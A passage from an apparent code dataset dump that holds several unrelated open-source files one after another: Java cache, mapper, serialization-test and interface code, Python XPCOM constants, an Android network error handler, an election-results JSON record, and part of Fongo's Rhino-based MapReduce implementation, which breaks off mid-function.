(tags.updateFastForward(refName, oldValue, newValue)) { cache.put(name.get(), val); } } } } } TagSetHolder get(Project.NameKey name) { EntryVal val = cache.getIfPresent(name.get()); if (val == null) { synchronized (createLock) { val = cache.getIfPresent(name.get()); if (val == null) { val = new EntryVal(); val.holder = new TagSetHolder(name); cache.put(name.get(), val); } } } return val.holder; } void put(Project.NameKey name, TagSetHolder tags) { EntryVal val = new EntryVal(); val.holder = tags; cache.put(name.get(), val); } static class EntryVal implements Serializable { static final long serialVersionUID = 1L; transient TagSetHolder holder; private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { holder = new TagSetHolder(new Project.NameKey(in.readUTF())); if (in.readBoolean()) { TagSet tags = new TagSet(holder.getProjectName()); tags.readObject(in); holder.setTagSet(tags); } } private void writeObject(ObjectOutputStream out) throws IOException { TagSet tags = holder.getTagSet(); out.writeUTF(holder.getProjectName().get()); out.writeBoolean(tags != null); if (tags != null) { tags.writeObject(out); } } } }
1,498
5,133
<gh_stars>1000+ /* * Copyright MapStruct Authors. * * Licensed under the Apache License version 2.0, available at http://www.apache.org/licenses/LICENSE-2.0 */ package org.mapstruct.ap.test.bugs._2149; import org.mapstruct.BeanMapping; import org.mapstruct.Mapper; import org.mapstruct.Mapping; /** * @author <NAME> */ @Mapper public interface Erroneous2149Mapper { @BeanMapping(ignoreByDefault = true) @Mapping(target = ".", source = "name") Target map(Source source); class Target { private String firstName; private String age; private String address; public String getFirstName() { return firstName; } public void setFirstName(String firstName) { this.firstName = firstName; } public String getAge() { return age; } public void setAge(String age) { this.age = age; } public String getAddress() { return address; } public void setAddress(String address) { this.address = address; } } class Source { private final String age; private final Name name; public Source(String age, Name name) { this.age = age; this.name = name; } public String getAge() { return age; } public Name getName() { return name; } } class Name { private final String firstName; public Name(String firstName) { this.firstName = firstName; } public String getFirstName() { return firstName; } } }
763
521
<gh_stars>100-1000 # ***** BEGIN LICENSE BLOCK ***** # Version: MPL 1.1/GPL 2.0/LGPL 2.1 # # The contents of this file are subject to the Mozilla Public License Version # 1.1 (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # http://www.mozilla.org/MPL/ # # Software distributed under the License is distributed on an "AS IS" basis, # WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License # for the specific language governing rights and limitations under the # License. # # The Original Code is the Python XPCOM language bindings. # # The Initial Developer of the Original Code is # ActiveState Tool Corp. # Portions created by the Initial Developer are Copyright (C) 2000, 2001 # the Initial Developer. All Rights Reserved. # # Contributor(s): # <NAME> <<EMAIL>> (original author) # # Alternatively, the contents of this file may be used under the terms of # either the GNU General Public License Version 2 or later (the "GPL"), or # the GNU Lesser General Public License Version 2.1 or later (the "LGPL"), # in which case the provisions of the GPL or the LGPL are applicable instead # of those above. If you wish to allow use of your version of this file only # under the terms of either the GPL or the LGPL, and not to allow others to # use your version of this file under the terms of the MPL, indicate your # decision by deleting the provisions above and replace them with the notice # and other provisions required by the GPL or the LGPL. If you do not delete # the provisions above, a recipient may use your version of this file under # the terms of any one of the MPL, the GPL or the LGPL. # # ***** END LICENSE BLOCK ***** # Could maybe later have a process that extracted these enums should they change. # from nsFileLocations.h App_DirectoryBase = 0x00010000 App_PrefsDirectory30 = App_DirectoryBase + 1 App_PrefsDirectory40 = App_DirectoryBase + 2 App_PrefsDirectory50 = App_DirectoryBase + 3 App_ResDirectory = App_DirectoryBase + 5 App_UserProfileDirectory30 = App_DirectoryBase + 10 App_UserProfileDirectory40 = App_DirectoryBase + 11 App_UserProfileDirectory50 = App_DirectoryBase + 12 App_DefaultUserProfileRoot30 = App_DirectoryBase + 13 App_DefaultUserProfileRoot40 = App_DirectoryBase + 14 App_DefaultUserProfileRoot50 = App_DirectoryBase + 15 App_ProfileDefaultsFolder30 = App_DirectoryBase + 16 App_ProfileDefaultsFolder40 = App_DirectoryBase + 17 App_ProfileDefaultsFolder50 = App_DirectoryBase + 18 App_PrefDefaultsFolder50 = App_DirectoryBase + 19 App_DefaultsFolder50 = App_DirectoryBase + 25 App_ComponentsDirectory = App_DirectoryBase + 30 App_ChromeDirectory = App_DirectoryBase + 31 App_PluginsDirectory = App_DirectoryBase + 32 App_UserChromeDirectory = App_DirectoryBase + 40 App_FileBase = App_DirectoryBase + 1000 App_PreferencesFile30 = App_FileBase + 1 App_PreferencesFile40 = App_FileBase + 2 App_PreferencesFile50 = App_FileBase + 3 App_BookmarksFile30 = App_FileBase + 10 App_BookmarksFile40 = App_FileBase + 11 App_BookmarksFile50 = App_FileBase + 12 App_Registry40 = App_FileBase + 20 App_Registry50 = App_FileBase + 21 App_LocalStore50 = App_FileBase + 30 App_History50 = App_FileBase + 40 App_MailDirectory50 = App_FileBase + 50 App_ImapMailDirectory50 = App_FileBase + 60 App_NewsDirectory50 = App_FileBase + 70 App_MessengerFolderCache50 = App_FileBase + 80 App_UsersPanels50 = App_FileBase + 90 App_SearchFile50 = App_FileBase + 100 App_SearchDirectory50 = App_FileBase + 101 # From nsSpecialSystemDirectory.h OS_DriveDirectory = 1 OS_TemporaryDirectory = 2 OS_CurrentProcessDirectory= 3 OS_CurrentWorkingDirectory= 4 XPCOM_CurrentProcessComponentDirectory= 5 XPCOM_CurrentProcessComponentRegistry= 6 Moz_BinDirectory = 10 Mac_SystemDirectory = 101 Mac_DesktopDirectory = 102 Mac_TrashDirectory = 103 Mac_StartupDirectory = 104 Mac_ShutdownDirectory = 105 Mac_AppleMenuDirectory = 106 Mac_ControlPanelDirectory = 107 Mac_ExtensionDirectory = 108 Mac_FontsDirectory = 109 Mac_PreferencesDirectory = 110 Mac_DocumentsDirectory = 111 Mac_InternetSearchDirectory = 112 Win_SystemDirectory = 201 Win_WindowsDirectory = 202 Win_HomeDirectory = 203 Win_Desktop = 204 Win_Programs = 205 Win_Controls = 206 Win_Printers = 207 Win_Personal = 208 Win_Favorites = 209 Win_Startup = 210 Win_Recent = 211 Win_Sendto = 212 Win_Bitbucket = 213 Win_Startmenu = 214 Win_Desktopdirectory = 215 Win_Drives = 216 Win_Network = 217 Win_Nethood = 218 Win_Fonts = 219 Win_Templates = 220 Win_Common_Startmenu = 221 Win_Common_Programs = 222 Win_Common_Startup = 223 Win_Common_Desktopdirectory = 224 Win_Appdata = 225 Win_Printhood = 226 Unix_LocalDirectory = 301 Unix_LibDirectory = 302 Unix_HomeDirectory = 303 BeOS_SettingsDirectory = 401 BeOS_HomeDirectory = 402 BeOS_DesktopDirectory = 403 BeOS_SystemDirectory = 404 OS2_SystemDirectory = 501 # Type/Variant related constants. TD_INT8 = 0 TD_INT16 = 1 TD_INT32 = 2 TD_INT64 = 3 TD_UINT8 = 4 TD_UINT16 = 5 TD_UINT32 = 6 TD_UINT64 = 7 TD_FLOAT = 8 TD_DOUBLE = 9 TD_BOOL = 10 TD_CHAR = 11 TD_WCHAR = 12 TD_VOID = 13 TD_PNSIID = 14 TD_DOMSTRING = 15 TD_PSTRING = 16 TD_PWSTRING = 17 TD_INTERFACE_TYPE = 18 TD_INTERFACE_IS_TYPE = 19 TD_ARRAY = 20 TD_PSTRING_SIZE_IS = 21 TD_PWSTRING_SIZE_IS = 22 TD_UTF8STRING = 23 TD_CSTRING = 24 TD_ASTRING = 25 # From xpt_struct.h XPT_TDP_POINTER = 0x80 XPT_TDP_UNIQUE_POINTER = 0x40 XPT_TDP_REFERENCE = 0x20 XPT_TDP_FLAGMASK = 0xe0 XPT_TDP_TAGMASK = (~XPT_TDP_FLAGMASK) def XPT_TDP_TAG(tdp): return (tdp & XPT_TDP_TAGMASK) def XPT_TDP_IS_POINTER(flags): return (flags & XPT_TDP_POINTER) def XPT_TDP_IS_UNIQUE_POINTER(flags): return (flags & XPT_TDP_UNIQUE_POINTER) def XPT_TDP_IS_REFERENCE(flags): return (flags & XPT_TDP_REFERENCE) XPT_ID_SCRIPTABLE = 0x80 XPT_ID_FLAGMASK = 0x80 XPT_ID_TAGMASK = ~XPT_ID_FLAGMASK def XPT_ID_TAG(id): return id & XPT_ID_TAGMASK def XPT_ID_IS_SCRIPTABLE(flags): return flags & XPT_ID_SCRIPTABLE XPT_PD_IN = 0x80 XPT_PD_OUT = 0x40 XPT_PD_RETVAL = 0x20 XPT_PD_SHARED = 0x10 XPT_PD_DIPPER = 0x08 XPT_PD_FLAGMASK = 0xf0 def XPT_PD_IS_IN(flags): return (flags & XPT_PD_IN) def XPT_PD_IS_OUT(flags): return (flags & XPT_PD_OUT) def XPT_PD_IS_RETVAL(flags): return (flags & XPT_PD_RETVAL) def XPT_PD_IS_SHARED(flags): return (flags & XPT_PD_SHARED) def XPT_PD_IS_DIPPER(flags): return (flags & XPT_PD_DIPPER) XPT_MD_GETTER = 0x80 XPT_MD_SETTER = 0x40 XPT_MD_NOTXPCOM = 0x20 XPT_MD_CTOR = 0x10 XPT_MD_HIDDEN = 0x08 XPT_MD_FLAGMASK = 0xf8 def XPT_MD_IS_GETTER(flags): return (flags & XPT_MD_GETTER) def XPT_MD_IS_SETTER(flags): return (flags & XPT_MD_SETTER) def XPT_MD_IS_NOTXPCOM(flags): return (flags & XPT_MD_NOTXPCOM) def XPT_MD_IS_CTOR(flags): return (flags & XPT_MD_CTOR) def XPT_MD_IS_HIDDEN(flags): return (flags & XPT_MD_HIDDEN) # From xptinfo.h T_I8 = TD_INT8 T_I16 = TD_INT16 T_I32 = TD_INT32 T_I64 = TD_INT64 T_U8 = TD_UINT8 T_U16 = TD_UINT16 T_U32 = TD_UINT32 T_U64 = TD_UINT64 T_FLOAT = TD_FLOAT T_DOUBLE = TD_DOUBLE T_BOOL = TD_BOOL T_CHAR = TD_CHAR T_WCHAR = TD_WCHAR T_VOID = TD_VOID T_IID = TD_PNSIID T_DOMSTRING = TD_DOMSTRING T_CHAR_STR = TD_PSTRING T_WCHAR_STR = TD_PWSTRING T_INTERFACE = TD_INTERFACE_TYPE T_INTERFACE_IS = TD_INTERFACE_IS_TYPE T_ARRAY = TD_ARRAY T_PSTRING_SIZE_IS = TD_PSTRING_SIZE_IS T_PWSTRING_SIZE_IS = TD_PWSTRING_SIZE_IS T_UTF8STRING = TD_UTF8STRING T_CSTRING = TD_CSTRING T_ASTRING = TD_ASTRING # from nsIVariant VTYPE_INT8 = 0 VTYPE_INT16 = 1 VTYPE_INT32 = 2 VTYPE_INT64 = 3 VTYPE_UINT8 = 4 VTYPE_UINT16 = 5 VTYPE_UINT32 = 6 VTYPE_UINT64 = 7 VTYPE_FLOAT = 8 VTYPE_DOUBLE = 9 VTYPE_BOOL = 10 VTYPE_CHAR = 11 VTYPE_WCHAR = 12 VTYPE_VOID = 13 VTYPE_ID = 14 VTYPE_DOMSTRING = 15 VTYPE_CHAR_STR = 16 VTYPE_WCHAR_STR = 17 VTYPE_INTERFACE = 18 VTYPE_INTERFACE_IS = 19 VTYPE_ARRAY = 20 VTYPE_STRING_SIZE_IS = 21 VTYPE_WSTRING_SIZE_IS = 22 VTYPE_UTF8STRING = 23 VTYPE_CSTRING = 24 VTYPE_ASTRING = 25 VTYPE_EMPTY_ARRAY = 254 VTYPE_EMPTY = 255
4,650
396
package com.ljy.devring.http.support.throwable; import android.net.ParseException; import com.google.gson.Gson; import com.google.gson.JsonParseException; import org.json.JSONException; import java.io.IOException; import java.net.ConnectException; import java.net.SocketTimeoutException; import java.net.UnknownHostException; import retrofit2.HttpException; /** * author: ljy * date: 2017/9/14 * description: 网络请求异常处理 */ public class ThrowableHandler { /** * 处理异常从而得到异常类型以及异常提示 */ public static HttpThrowable handleThrowable(Throwable throwable) { if (throwable instanceof HttpException) { return new HttpThrowable(HttpThrowable.HTTP_ERROR, "网络(协议)异常", throwable); } else if (throwable instanceof JsonParseException || throwable instanceof JSONException || throwable instanceof ParseException) { return new HttpThrowable(HttpThrowable.PARSE_ERROR, "数据解析异常", throwable); } else if (throwable instanceof UnknownHostException) { return new HttpThrowable(HttpThrowable.NO_NET_ERROR, "网络连接失败,请稍后重试", throwable); } else if (throwable instanceof SocketTimeoutException) { return new HttpThrowable(HttpThrowable.TIME_OUT_ERROR, "连接超时", throwable); } else if (throwable instanceof ConnectException) { return new HttpThrowable(HttpThrowable.CONNECT_ERROR, "连接异常", throwable); } else if (throwable instanceof javax.net.ssl.SSLHandshakeException) { return new HttpThrowable(HttpThrowable.SSL_ERROR, "证书验证失败", throwable); } else { return new HttpThrowable(HttpThrowable.UNKNOWN, throwable.getMessage(), throwable); } } /** * 从HttpException类型的throwalbe中得到其响应实体并转换为指定格式 * * @param throwable HttpException类型的throwalbe * @param clazz 响应实体对应的格式 */ public static <T> T fromJson(Throwable throwable, Class<T> clazz) { HttpException httpException = (HttpException) throwable; Gson gson = new Gson(); T t = null; try { t = gson.fromJson(httpException.response().errorBody().string(), clazz); } catch (IOException e) { e.printStackTrace(); } return t; } }
1,061
348
{"nom":"Ychoux","circ":"1ère circonscription","dpt":"Landes","inscrits":1633,"abs":851,"votants":782,"blancs":13,"nuls":11,"exp":758,"res":[{"nuance":"MDM","nom":"<NAME>","voix":290},{"nuance":"FI","nom":"<NAME>","voix":114},{"nuance":"FN","nom":"M. <NAME>","voix":113},{"nuance":"LR","nom":"Mme <NAME>","voix":99},{"nuance":"SOC","nom":"M. <NAME>","voix":74},{"nuance":"ECO","nom":"Mme <NAME>","voix":28},{"nuance":"DLF","nom":"M. <NAME>","voix":13},{"nuance":"COM","nom":"M. <NAME>","voix":8},{"nuance":"EXG","nom":"Mme <NAME>","voix":8},{"nuance":"DIV","nom":"M. <NAME>","voix":5},{"nuance":"DVD","nom":"<NAME>","voix":3},{"nuance":"EXG","nom":"<NAME>","voix":3},{"nuance":"DVD","nom":"Mme <NAME>","voix":0}]}
289
4,283
/* * Copyright (c) 2008-2021, Hazelcast, Inc. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.hazelcast.map.impl.record; import com.hazelcast.internal.serialization.Data; import com.hazelcast.internal.serialization.InternalSerializationService; import com.hazelcast.internal.serialization.impl.DefaultSerializationServiceBuilder; import com.hazelcast.internal.serialization.impl.ObjectDataInputStream; import com.hazelcast.internal.serialization.impl.ObjectDataOutputStream; import com.hazelcast.map.impl.recordstore.expiry.ExpiryMetadata; import com.hazelcast.map.impl.recordstore.expiry.ExpiryMetadataImpl; import com.hazelcast.test.HazelcastParallelClassRunner; import com.hazelcast.test.annotation.ParallelJVMTest; import com.hazelcast.test.annotation.QuickTest; import org.junit.Before; import org.junit.Test; import org.junit.experimental.categories.Category; import org.junit.runner.RunWith; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; import static com.hazelcast.map.impl.record.RecordReaderWriter.DATA_RECORD_WITH_STATS_READER_WRITER; import static org.junit.Assert.assertEquals; @RunWith(HazelcastParallelClassRunner.class) @Category({QuickTest.class, ParallelJVMTest.class}) public class RecordReaderWriterTest { InternalSerializationService ss; @Before public void setUp() throws Exception { DefaultSerializationServiceBuilder ssBuilder = new DefaultSerializationServiceBuilder(); ss = ssBuilder.setVersion(InternalSerializationService.VERSION_1).build(); } @Test public void data_record_with_stats_matching_reader_writer_id_is_data_record_with_stats_reader_writer_id() { assertEquals(DATA_RECORD_WITH_STATS_READER_WRITER, new DataRecordWithStats().getMatchingRecordReaderWriter()); } @Test public void object_record_with_stats_matching_reader_writer_id_is_data_record_with_stats_reader_writer_id() { assertEquals(DATA_RECORD_WITH_STATS_READER_WRITER, new ObjectRecordWithStats().getMatchingRecordReaderWriter()); } private ExpiryMetadata newExpiryMetadata() { return new ExpiryMetadataImpl(); } @Test public void written_and_read_data_record_with_stats_are_equal() throws IOException { ExpiryMetadata expiryMetadata = newExpiryMetadata(); Record<Data> writtenRecord = populateAndGetRecord(new DataRecordWithStats(), expiryMetadata); Record<Data> readRecord = writeReadAndGet(writtenRecord, writtenRecord.getValue(), expiryMetadata); assertEquals(writtenRecord, readRecord); } @Test public void written_and_read_object_record_with_stats_are_equal() throws IOException { ExpiryMetadata expiryMetadata = newExpiryMetadata(); Record writtenRecord = populateAndGetRecord(new ObjectRecordWithStats(), expiryMetadata); Data dataValue = ss.toData(writtenRecord.getValue()); Record<Data> readRecord = writeReadAndGet(writtenRecord, dataValue, expiryMetadata); assertEquals(asDataRecordWithStats(writtenRecord, dataValue), readRecord); } private Record populateAndGetRecord(Record writtenRecord, ExpiryMetadata expiryMetadata) { writtenRecord.setVersion(3); writtenRecord.setLastUpdateTime(4); writtenRecord.setLastAccessTime(5); writtenRecord.setLastStoredTime(6); writtenRecord.setCreationTime(8); writtenRecord.setVersion(9); writtenRecord.setHits(10); writtenRecord.setValue(ss.toData(11)); expiryMetadata.setTtl(1); expiryMetadata.setMaxIdle(2); expiryMetadata.setExpirationTime(7); return writtenRecord; } private Record writeReadAndGet(Record expectedRecord, Data dataValue, ExpiryMetadata expiryMetadata) throws IOException { ByteArrayOutputStream outputStream = new ByteArrayOutputStream(); ObjectDataOutputStream out = new ObjectDataOutputStream(outputStream, ss); Records.writeRecord(out, expectedRecord, dataValue); ObjectDataInputStream in = new ObjectDataInputStream(new ByteArrayInputStream(outputStream.toByteArray()), ss); return Records.readRecord(in); } private static Record<Data> asDataRecordWithStats(Record fromRecord, Data value) { DataRecordWithStats toRecord = new DataRecordWithStats(value); toRecord.setValue(value); return copyMetadata(fromRecord, toRecord); } private static Record copyMetadata(Record fromRecord, Record toRecord) { toRecord.setHits(fromRecord.getHits()); toRecord.setVersion(fromRecord.getVersion()); toRecord.setCreationTime(fromRecord.getCreationTime()); toRecord.setLastAccessTime(fromRecord.getLastAccessTime()); toRecord.setLastStoredTime(fromRecord.getLastStoredTime()); toRecord.setLastUpdateTime(fromRecord.getLastUpdateTime()); return toRecord; } }
1,844
6,497
<reponame>JokerQueue/cachecloud package com.sohu.cache.web.service; import java.util.List; import com.sohu.cache.entity.ServerInfo; import com.sohu.cache.entity.ServerStatus; import com.sohu.cache.server.data.Server; public interface ServerDataService { /** * 查询服务器基本信息 * @param ip * @return @ServerInfo */ public ServerInfo queryServerInfo(String ip); /** * 获取所有机器的系统信息 * @return */ public List<ServerInfo> getAllServerInfo(); /** * 保存服务器发行版信息 * @param ip * @param dist from /etc/issue */ public void saveServerInfo(String ip, String dist); /** * 保存/更新服务器信息 * @param server * @return 影响的行数 */ public Integer saveAndUpdateServerInfo(Server server); /** * 查询服务器状态 * @param ip * @param date * @return List<ServerStatus> */ public List<ServerStatus> queryServerStatus(String ip, String date); /** * 查询服务器状态 * @param ip * @param date * @return List<ServerStatus> */ public List<ServerStatus> queryServerOverview(String ip, String date); /** * 查询服务器状态 * @param ip * @param date * @return List<ServerStatus> */ public List<ServerStatus> queryServerCpu(String ip, String date); /** * 查询服务器状态 * @param ip * @param date * @return List<ServerStatus> */ public List<ServerStatus> queryServerNet(String ip, String date); /** * 查询服务器状态 * @param ip * @param date * @return List<ServerStatus> */ public List<ServerStatus> queryServerDisk(String ip, String date); /** * 保存服务器状态 */ public void saveServerStat(Server server); }
784
364
<gh_stars>100-1000 package com.linkedin.dagli.transformer; import com.linkedin.dagli.annotation.equality.IgnoredByValueEquality; import com.linkedin.dagli.producer.Producer; import com.linkedin.dagli.transformer.internal.TransformerDynamicInternalAPI; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.List; /** * Base class for dynamic-arity transformers. Note that derived transformer implementations should not extend this * class directly. Instead, extend the base class corresponding to the type (prepared/preparable) of the transformer * you're creating, e.g. {@link AbstractPreparedTransformerDynamic}. * * @param <R> the type of value produced by this transformer * @param <I> the type of the internal API object used by this transformer * @param <S> the ultimate derived type of the transformer extending this class */ @IgnoredByValueEquality abstract class AbstractTransformerDynamic<R, I extends TransformerDynamicInternalAPI<R, S>, S extends AbstractTransformerDynamic<R, I, S>> extends AbstractTransformer<R, I, S> implements TransformerDynamic<R> { private static final long serialVersionUID = 1; protected List<Producer<?>> _inputs; /** * Creates a new transformer with no inputs. */ public AbstractTransformerDynamic() { this(Collections.emptyList()); } /** * Creates a new transformer with the specified inputs. * * @param inputs the inputs for the transformer */ public AbstractTransformerDynamic(Producer<?>... inputs) { this(Arrays.asList(inputs)); } /** * Creates a new transformer with the specified inputs. * * @param inputs the inputs for the transformer */ public AbstractTransformerDynamic(List<? extends Producer<?>> inputs) { _inputs = new ArrayList<>(inputs); } /** * Gets a list of all the inputs to this transformer. * * @return a list of the transformer's inputs */ @Override protected List<? extends Producer<?>> getInputList() { return _inputs; } /** * Creates a new transformer that uses the specified inputs but is otherwise a copy of this one. * * The returned instance <strong>must</strong> be a new instance, as Dagli may rely on this invariant. * * It is "unsafe" because the inputs provided are not (necessarily) type-checked, even at runtime, which may result * in logic bugs. * * @param newInputs the new inputs that will be used by the copy of the transformer * @return a copy of the transformer that uses the specified inputs */ protected S withInputsUnsafe(List<? extends Producer<?>> newInputs) { return clone(r -> r._inputs = new ArrayList<>(newInputs)); } protected abstract class InternalAPI extends AbstractTransformer<R, I, S>.InternalAPI implements TransformerDynamicInternalAPI<R, S> { } }
830
492
package com.github.fakemongo.impl; import com.github.fakemongo.Fongo; import com.mongodb.*; import com.mongodb.operation.MapReduceStatistics; import com.mongodb.util.FongoJSON; import com.mongodb.util.ObjectSerializer; import org.mozilla.javascript.*; import org.mozilla.javascript.tools.shell.Global; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.lang.reflect.InvocationTargetException; import java.util.*; /** * http://docs.mongodb.org/manual/reference/method/db.collection.mapReduce/ * <p/> * TODO : finalize. */ public class MapReduce { private static final Logger LOG = LoggerFactory.getLogger(MapReduce.class); private final FongoDB fongoDB; private final FongoDBCollection fongoDBCollection; private final String map; private final String reduce; // TODO private final String finalize; private final Map<String, Object> scope; private final DBObject out; private final DBObject query; private final DBObject sort; private final int limit; // http://docs.mongodb.org/manual/reference/method/db.collection.mapReduce/ private enum Outmode { REPLACE { @Override public void initCollection(DBCollection coll) { // Must replace all. coll.remove(new BasicDBObject()); } @Override public void newResults(MapReduce mr, DBCollection coll, List<DBObject> results) { coll.insert(results); } }, MERGE { @Override public void newResults(MapReduce mr, DBCollection coll, List<DBObject> results) { // Upsert == insert the result if not exist. for (DBObject result : results) { coll.update(new BasicDBObject(FongoDBCollection.ID_FIELD_NAME, result.get(FongoDBCollection.ID_FIELD_NAME)), result, true, false); } } }, REDUCE { @Override public void newResults(MapReduce mr, DBCollection coll, List<DBObject> results) { final List<DBObject> reduced = mr.reduceOutputStage(coll, results); for (DBObject result : reduced) { coll.update(new BasicDBObject(FongoDBCollection.ID_FIELD_NAME, result.get(FongoDBCollection.ID_FIELD_NAME)), result, true, false); } } }, INLINE { @Override public void initCollection(DBCollection coll) { // Must replace all. coll.remove(new BasicDBObject()); } @Override public void newResults(MapReduce mr, DBCollection coll, List<DBObject> results) { coll.insert(results); } @Override public String collectionName(DBObject object) { // Random uuid for extract result after. return UUID.randomUUID().toString(); } @Override public MapReduceOutput createResult(DBObject query, final DBCollection coll, final MapReduceStatistics ignored) { return new FongoMapReduceOutput(query, coll.find().toArray()); } }; public static Outmode valueFor(DBObject object) { for (Outmode outmode : values()) { if (object.containsField(outmode.name().toLowerCase())) { return outmode; } } return null; } public static Outmode valueFor(MapReduceCommand.OutputType outputType) { for (Outmode outmode : values()) { if (outputType.name().equalsIgnoreCase(outmode.name().toLowerCase())) { return outmode; } } return null; } public String collectionName(DBObject object) { return (String) object.get(name().toLowerCase()); } public void initCollection(DBCollection coll) { // Do nothing. } public abstract void newResults(MapReduce mapReduce, DBCollection coll, List<DBObject> results); public MapReduceOutput createResult(final DBObject query, final DBCollection coll, final MapReduceStatistics mapReduceStatistics) { return new FongoMapReduceOutput(query, coll, mapReduceStatistics); } } public MapReduce(Fongo fongo, FongoDBCollection coll, String map, String reduce, String finalize, Map<String, Object> scope, DBObject out, DBObject query, DBObject sort, Number limit) { if (out.containsField("db")) { this.fongoDB = fongo.getDB((String) out.get("db")); } else { this.fongoDB = (FongoDB) coll.getDB(); } this.fongoDBCollection = coll; this.map = map; this.reduce = reduce; this.finalize = finalize; this.scope = scope; this.out = out; this.query = query; this.sort = sort; this.limit = limit == null ? 0 : limit.intValue(); } /** * @return null if error. */ public MapReduceOutput computeResult() { final long startTime = System.currentTimeMillis(); // Replace, merge or reduce ? Outmode outmode = Outmode.valueFor(out); DBCollection coll = fongoDB.getCollection(outmode.collectionName(out)); // Mode replace. outmode.initCollection(coll); final MapReduceResult mapReduceResult = runInContext(); outmode.newResults(this, coll, mapReduceResult.result); final MapReduceStatistics mapReduceStatistics = new MapReduceStatistics(mapReduceResult.inputCount, mapReduceResult.outputCount, mapReduceResult.emitCount, (int) (System.currentTimeMillis() - startTime)); final MapReduceOutput result = outmode.createResult(this.query, coll, mapReduceStatistics); LOG.debug("computeResult() : {}", result); return result; } static class MapReduceResult { final int inputCount, outputCount, emitCount; final List<DBObject> result; public MapReduceResult(int inputCount, int outputCount, int emitCount, List<DBObject> result) { this.inputCount = inputCount; this.outputCount = outputCount; this.emitCount = emitCount; this.result = result; } } private MapReduceResult runInContext() { // TODO use Compilable ? http://www.jmdoudoux.fr/java/dej/chap-scripting.htm Context cx = Context.enter(); try { Scriptable scriptable = new Global(cx);//cx.initStandardObjects(); cx.initStandardObjects(); ScriptableObject.defineClass(scriptable, FongoNumberLong.class); ScriptableObject.defineClass(scriptable, FongoNumberInt.class); // cx.setGeneratingDebug(true); // cx.getWrapFactory().setJavaPrimitiveWrap(false); final StringBuilder stringBuilder = new StringBuilder(); // Add some function to javascript engine. this.addMongoFunctions(stringBuilder); this.addScopeObjects(stringBuilder); final List<String> javascriptFunctions = new ArrayList<String>(); javascriptFunctions.add(stringBuilder.toString()); final List<DBObject> objects = this.fongoDBCollection.find(query).sort(sort).limit(limit).toArray(); constructJavascriptFunction(javascriptFunctions, objects); for (String jsFunction : javascriptFunctions) { try { cx.evaluateString(scriptable, jsFunction, "MapReduce", 0, null); } catch (RhinoException e) { LOG.error("Exception running script {}", jsFunction, e); if (e.getMessage().contains("FongoAssertException")) { fongoDB.notOkErrorResult(16722, "Error: assert failed: " + e.getMessage()).throwOnError(); } fongoDB.notOkErrorResult(16722, "JavaScript execution failed: " + e.getMessage()).throwOnError(); } } // Get the result into an object. final NativeArray outs = (NativeArray) scriptable.get("$$$fongoOuts$$$", scriptable); final List<DBObject> dbOuts = new ArrayList<DBObject>(); for (int i = 0; i < outs.getLength(); i++) { final NativeObject out = (NativeObject) outs.get(i, outs); dbOuts.add(getObject(out)); } // TODO : verify emitCount return new MapReduceResult(objects.size(), dbOuts.size(), objects.size(), dbOuts); } catch (IllegalAccessException e) { throw new RuntimeException(e); } catch (InstantiationException e) { throw new RuntimeException(e); } catch (InvocationTargetException e) { throw new RuntimeException(e); } finally { Context.exit(); } } private void addScopeObjects(StringBuilder stringBuilder) { if (this.scope != null) { for (Map.Entry<String, Object> entry : this.scope.entrySet()) { stringBuilder.append("var ").append(entry.getKey()).append(" = "); FongoJSON.serialize(entry.getValue(), stringBuilder, OBJECT_SERIALIZERS); stringBuilder.append(";\n"); } } } private List<DBObject> reduceOutputStage(DBCollection coll, List<DBObject> mapReduceOutput) { Context cx = Context.enter(); try { final Scriptable scope = cx.initStandardObjects(); final List<String> jsFunctions = constructReduceOutputStageJavascriptFunction(coll, mapReduceOutput); for (String jsFunction : jsFunctions) { try { cx.evaluateString(scope, jsFunction, "<reduce output stage>", 0, null); } catch (RhinoException e) { LOG.error("Exception running script {}", jsFunction, e); if (e.getMessage().contains("FongoAssertException")) { fongoDB.notOkErrorResult(16722, "Error: assert failed: " + e.getMessage()).throwOnError(); } fongoDB.notOkErrorResult(16722, "JavaScript execution failed: " + e.getMessage()).throwOnError(); } } // Get the result into an object. NativeArray outs = (NativeArray) scope.get("$$$fongoOuts$$$", scope); List<DBObject> dbOuts = new ArrayList<DBObject>(); for (int i = 0; i < outs.getLength(); i++) { NativeObject out = (NativeObject) outs.get(i, outs); dbOuts.add(getObject(out)); } LOG.debug("reduceOutputStage() : {}", dbOuts); return dbOuts; } finally { Context.exit(); } } DBObject getObject(ScriptableObject no) { if (no instanceof NativeArray) { BasicDBList ret = new BasicDBList(); NativeArray noArray = (NativeArray) no; for (int i = 0; i < noArray.getLength(); i++) { Object value = noArray.get(i, noArray); value = getObjectOrTransform(value); ret.add(value); } return ret; } DBObject ret = new BasicDBObject(); Object[] propIds = no.getIds(); for (Object propId : propIds) { String key = Context.toString(propId); Object value = NativeObject.getProperty(no, key); value = getObjectOrTransform(value); ret.put(key, value); } return ret; } private Object getObjectOrTransform(Object value) { if (value instanceof NativeObject || value instanceof NativeArray) { value = getObject((ScriptableObject) value); } if (value instanceof Integer) { value = ((Integer) value).doubleValue(); } if (value instanceof ConsString) { value = value.toString(); } if (value instanceof NativeJavaObject) { value = ((NativeJavaObject) value).unwrap(); } if (value instanceof FongoNumberLong) { value = ((FongoNumberLong) value).value; } if (value instanceof FongoNumberInt) { value = ((FongoNumberInt) value).value; } return value; } /** * Create the map/reduce/finalize function. */ private List<String> constructJavascriptFunction(List<String> result, List<DBObject> objects) { StringBuilder sb = new StringBuilder(80000); // Create variables for exporting. sb.append("var $$$fongoEmits$$$ = new Object();\n"); sb.append("function emit(param1, param2) {\n" + "var toSource = param1.toSource();\n" + "if(typeof $$$fongoEmits$$$[toSource] === 'undefined') {\n " + "$$$fongoEmits$$$[toSource] = new Array();\n" + "}\n" + "var val = {id: param1, value: param2};\n" + 